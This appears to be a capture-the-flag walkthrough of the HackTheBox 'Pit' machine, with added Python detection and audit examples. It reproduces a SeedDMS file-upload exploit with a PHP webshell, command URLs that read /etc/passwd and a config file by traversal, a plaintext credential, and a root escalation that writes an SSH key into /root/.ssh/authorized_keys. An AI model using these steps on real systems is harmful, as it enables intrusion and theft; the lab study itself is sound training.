# PIT

## Scanning

**NMAP**

* TCP

```
➜  ~ nmap -T4 -p- -A pit.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 12:10 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.21s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 6f:c3:40:8f:69:50:69:5a:57:d7:9c:4e:7b:1b:94:96 (RSA)
|   256 c2:6f:f8:ab:a1:20:83:d1:60:ab:cf:63:2d:c8:65:b7 (ECDSA)
|_  256 6b:65:6c:a6:92:e5:cc:76:17:5a:2f:9a:e7:50:c3:50 (ED25519)
80/tcp   open  http            nginx 1.14.1
|_http-title: Test Page for the Nginx HTTP Server on Red Hat Enterprise Linux
9090/tcp open  ssl/zeus-admin?
| fingerprint-strings: 
|   GetRequest, HTTPOptions: 
|     HTTP/1.1 400 Bad request
|     Content-Type: text/html; charset=utf8
|     Transfer-Encoding: chunked
|     X-DNS-Prefetch-Control: off
|     Referrer-Policy: no-referrer
|     X-Content-Type-Options: nosniff
|     Cross-Origin-Resource-Policy: same-origin
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <title>
|     request
|     </title>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <style>
|     body {
|     margin: 0;
|     font-family: "RedHatDisplay", "Open Sans", Helvetica, Arial, sans-serif;
|     font-size: 12px;
|     line-height: 1.66666667;
|     color: #333333;
|     background-color: #f5f5f5;
|     border: 0;
|     vertical-align: middle;
|     font-weight: 300;
|_    margin: 0 0 10p
| ssl-cert: Subject: commonName=dms-pit.htb/organizationName=4cd9329523184b0ea52ba0d20a1a6f92/countryName=US
| Subject Alternative Name: DNS:dms-pit.htb, DNS:localhost, IP Address:127.0.0.1
| Not valid before: 2020-04-16T23:29:12
|_Not valid after:  2030-06-04T16:09:12
|_ssl-date: TLS randomness does not represent time
```

*Add `dms-pit.htb` to the hosts file.*

* UDP

  After a while I realised there was no way to start an attack through the TCP ports, so I went for a UDP scan.

```
➜  ~ sudo nmap -T5 -sU --top-ports 4 pit.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-18 14:10 EDT
Nmap scan report for pit.htb (10.10.10.241)
Host is up (0.22s latency).

PORT    STATE         SERVICE
123/udp filtered      ntp
137/udp filtered      netbios-ns
161/udp open|filtered snmp
631/udp filtered      ipp

Nmap done: 1 IP address (1 host up) scanned in 1.92 seconds
```

`161/udp open|filtered snmp` is the way in.

## Enumeration

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjja_SCCUaYdBYGOmtE%2Fimage.png?alt=media\&token=58d49fbe-20f2-418c-b711-5aa7c6fab3b9)

`cat 10.10.10.241.snmp`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjadeSSWdr9ydZiUrP%2Fimage.png?alt=media\&token=4a6c5cd0-28dd-46c7-92ab-e5688498f85c)

We find this directory `/seeddms51x/seeddms`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjagmYS6KeUyRzai_2%2Fimage.png?alt=media\&token=dd61362b-791a-4d36-afbf-862fd1361a47)

I tried some default credentials, but nothing worked.

Back to the SNMP output, searching for credentials.

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjakZ9TpS3JX6N-4_I%2Fimage.png?alt=media\&token=88428ce1-8c66-4340-bc22-3271ea178aa3)

After some tries, the credentials `michelle:michelle` worked.

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjamcVvfwyTHj6omYh%2Fimage.png?alt=media\&token=0b78fd51-f7b3-473e-99d7-98acefe18c68)

## Exploit

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjaqbEhqBh6pxsJaIR%2Fimage.png?alt=media\&token=ba4815e2-43e2-4662-b963-b9bf3aaf7b71)

Now we know the DMS version: `seedDMS 5.1.15`.

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjaubpUao3UtCE-HqS%2Fimage.png?alt=media\&token=5a76e185-b8a9-42b1-8a89-7b12c9bbd72e)

**exploit**

```
➜  ~ cat 47022.txt 
# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code: 
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
```

Create the backdoor:

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjazf40rG3oFPmrehL%2Fimage.png?alt=media\&token=61b72236-0301-461a-8ba9-980a0bda4672)

in this directory: `DMS /Docs /Users /Michelle /`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjb5-nF_QD-Y-oebfk%2Fimage.png?alt=media\&token=6135585a-717f-4ab3-a86b-e0ac0fa24b53)

Upload shell.php as `1.php` (**step 3**).

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjb8OQNj8nDapR8f6P%2Fimage.png?alt=media\&token=4bcdcd46-22e0-4d9c-b7a9-2207331a6abb)

`documentid=30` (check yours; it may differ).

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbBwVIB5nMtOqqdMs%2Fimage.png?alt=media\&token=e75b63ed-495a-46ae-bec5-43d466f3deaf)

**step 4**

`http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat%20/etc/passwd`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbGCuBL3sXK1krUuA%2Fimage.png?alt=media\&token=1043ded2-557c-4242-beba-9c08776fd648)

`/etc/shadow` is not accessible.

A reverse shell did not work.

I tried **path traversal** to reach the DB credentials, and it worked:

`http://dms-pit.htb/seeddms51x/data/1048576/30/1.php?cmd=cat%20../../../conf/settings.xml`

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbQLK_2wmMrumEJYX%2Fimage.png?alt=media\&token=319ae383-566f-4d0b-b819-9e306fc5bb68)
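As an added detection example (not part of the original writeup), this Python snippet scans nginx access-log lines for the pattern used above: a request for a PHP file under the SeedDMS `data/<folder>/<documentid>/` tree, with the `cmd` query parameter decoded and traversal sequences flagged. The log lines, client addresses, timestamps and sizes are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed nginx access-log lines (combined format) modelled on the requests above;
# hosts, timestamps and response sizes are made up.
SAMPLE_LOG = """\
10.10.14.5 - - [18/Aug/2021:12:30:01 -0400] "GET /seeddms51x/seeddms/out/out.ViewFolder.php?folderid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.5 - - [18/Aug/2021:12:31:10 -0400] "POST /seeddms51x/seeddms/op/op.AddDocument.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.5 - - [18/Aug/2021:12:32:44 -0400] "GET /seeddms51x/data/1048576/30/1.php?cmd=cat%20/etc/passwd HTTP/1.1" 200 1877 "-" "Mozilla/5.0"
10.10.14.5 - - [18/Aug/2021:12:35:02 -0400] "GET /seeddms51x/data/1048576/30/1.php?cmd=cat%20../../../conf/settings.xml HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
10.10.14.9 - - [18/Aug/2021:12:36:00 -0400] "GET /seeddms51x/data/1048576/12/1.pdf HTTP/1.1" 200 40212 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# SeedDMS stores uploads as data/<folder>/<documentid>/<version>.<ext>. A request for a
# script extension inside that tree means the web server is executing an uploaded file.
DATA_SCRIPT_RE = re.compile(r'^(?:/[^/]+)*/data/\d+/\d+/[^/]+\.(?:php\d?|phtml|phar)$', re.IGNORECASE)

def analyze_line(line):
    """Return a finding dict for a suspicious request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group('target'))
    if not DATA_SCRIPT_RE.match(target.path):
        return None
    finding = {
        'ip': m.group('ip'), 'ts': m.group('ts'), 'path': target.path,
        'status': int(m.group('status')),
        'reasons': ['script requested under SeedDMS data directory'],
    }
    cmd = parse_qs(target.query).get('cmd')  # parse_qs percent-decodes the value
    if cmd:
        finding['cmd'] = cmd[0]
        finding['reasons'].append('command parameter present')
        if '../' in cmd[0]:
            finding['reasons'].append('path traversal in command')
    return finding

def scan_log(text):
    """Run analyze_line over every log line and keep only the findings."""
    return [f for f in (analyze_line(l) for l in text.splitlines()) if f]

if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f['ts'], f['ip'], f['path'], f.get('cmd'), '|', '; '.join(f['reasons']))
```

Serving the `data/` tree with PHP disabled (or denying it outright in nginx) is what removes the underlying condition; the scan only tells you it has already been used.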

Inspect this page and search for the username:

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbTSjAQ3GhifLUvFf%2Fimage.png?alt=media\&token=6b5b0413-b68a-4a04-927e-1eb8bc733131)

Let's use these credentials to log in to the main app.

After some tries, the credentials `michelle:ied^ieY6xoquu` worked.

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbW_2T5tRqVYmKXH-%2Fimage.png?alt=media\&token=fcbb2bdd-b126-466b-ab31-5aff86d2b22b)

WE IIIIIIIIIIIIIIIIIN 🎉

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbhhAMgN_ORckYu3Z%2Fimage.png?alt=media\&token=83f63fe8-53cf-4b92-a8cc-6967b8c034c3)

and the Terminal tab calls us

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbjpGWqbQ8x7D3Qtl%2Fimage.png?alt=media\&token=4ed1e892-b830-4320-aa59-91963e265865)

* [x] USER FLAG

## Privilege Escalation

From the SNMP enumeration we find this:

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjbovq5YuBsz0vQUKh%2Fimage.png?alt=media\&token=9dcf6363-1d0a-469b-8190-ec93dd066152)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbsMlB5Jc_h6GAz3A%2Fimage.png?alt=media\&token=bb4e90b4-7ac1-497d-af3f-7f3a80f949a8)

We can't access this directory:

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjbuNqvDKpEeHGZiFB%2Fimage.png?alt=media\&token=b1c14f03-e365-4317-ad83-a591c45029b8)

Let's check the permissions on this directory:

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjby0dGJZXwt8aGpld%2Fimage.png?alt=media\&token=21f3db7b-cdeb-4e51-95bf-990953411f23)

`michelle -wx`: we can write and execute.

Let's create an SSH payload with our public key and put it into the /usr/local/monitoring directory.

On the attacker machine:

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjc-YCF-6DHGDQO6Z2%2Fimage.png?alt=media\&token=6cd7d37a-8f20-41c4-a4bc-cbd7c54b1cb8)

After creating the key, place it in this payload and save it:

```
echo "your-public-ssh-key" > /root/.ssh/authorized_keys
```

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-Mjjc5iAFcdaCgtUavHE%2Fimage.png?alt=media\&token=461e3a5b-f51b-4f28-a854-cdba290a9a6a)

Save it as **check.sh**.

Start a local server:

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjcBVCBmKJCbLht8_K%2Fimage.png?alt=media\&token=f1d90c0e-424c-4285-afe1-a09d67195fa3)

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjcExOLeTv1FW7d7Jd%2Fimage.png?alt=media\&token=5f7f5278-b556-4da3-90aa-3080c573c6a0)

```
➜  ~ snmpwalk -m +MY-MIB -v2c -c public 10.10.10.241 nsExtendObjects
```

This line triggers execution of the script; for background on OIDs, check [this](https://www.dpstele.com/snmp/what-does-oid-network-elements.php).

![](https://2593446664-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MjI3O1E4kELEZI73S1H%2F-MjjZF2__I44HEZpAyiR%2F-MjjcJ-Eo86xpjVD9JMF%2Fimage.png?alt=media\&token=fe9c52b2-4f0d-47a6-9ec1-1b285eb2e406)
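Added example, not from the original writeup: the escalation works because walking `nsExtendObjects` makes snmpd run the programs named by `extend` lines in its snmpd.conf, and here the program's directory is writable by an unprivileged user while snmpd runs as root (the script wrote into /root). This Python audit parses `extend` lines and flags any program whose file or parent directory can be modified by a non-root user; the snmpd.conf excerpt and the stat table (standing in for `os.stat`) are constructed, with `/usr/local/monitoring` given the group `-wx` permission modelled on what the page shows.

```python
import stat

# Constructed snmpd.conf excerpt (not the box's real config). "extend" lines name the programs
# snmpd runs when NET-SNMP-EXTEND-MIB::nsExtendObjects is walked, as in the snmpwalk above.
SAMPLE_SNMPD_CONF = """\
rocommunity public
sysLocation Data center
extend monitoring /usr/local/monitoring/check.sh
extend uptime /bin/uptime
extend-sh statuscheck /usr/local/monitoring/status.sh
"""

# Constructed stat table standing in for os.stat(): path -> (st_mode, st_uid, st_gid).
# /usr/local/monitoring is root-owned but -wx for its group (modelled on the permissions
# shown above); check.sh does not exist yet, so a group member can simply create it.
FAKE_STAT = {
    '/': (0o40755, 0, 0),
    '/usr': (0o40755, 0, 0),
    '/usr/local': (0o40755, 0, 0),
    '/usr/local/monitoring': (0o40730, 0, 1001),
    '/usr/local/monitoring/status.sh': (0o100755, 0, 0),
    '/bin/uptime': (0o100755, 0, 0),
}

def ancestors(path):
    """Yield the path itself, then each parent directory up to '/'."""
    parts = path.rstrip('/').split('/')
    for i in range(len(parts), 0, -1):
        yield '/'.join(parts[:i]) or '/'

def weak_paths(prog, stat_table):
    """Paths in prog's chain that a non-root user could modify or replace (paths missing from
    the table are skipped: whoever can write the parent directory gets to create them)."""
    return [p for p in ancestors(prog)
            if p in stat_table and (stat_table[p][1] != 0
                                    or stat_table[p][0] & (stat.S_IWGRP | stat.S_IWOTH))]

def audit_snmpd_conf(conf_text, stat_table):
    """One finding per extend command whose program chain is writable by a non-root user."""
    findings = []
    for raw in conf_text.splitlines():
        tokens = raw.split('#', 1)[0].split()
        if not tokens or tokens[0].lower() not in ('extend', 'extendfix', 'extend-sh'):
            continue
        args = tokens[1:]
        if args and args[0][0] in '.0123456789':   # optional leading MIBOID form
            args = args[1:]
        weak = weak_paths(args[1], stat_table) if len(args) >= 2 else []
        if weak:
            findings.append({'name': args[0], 'prog': args[1], 'weak': weak})
    return findings
```

On a real host, build the table from `os.stat()` over the same chain; the remediation is a root-owned, non-writable directory for anything snmpd executes, or dropping the `extend` line entirely.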

* [x] ROOT FLAG
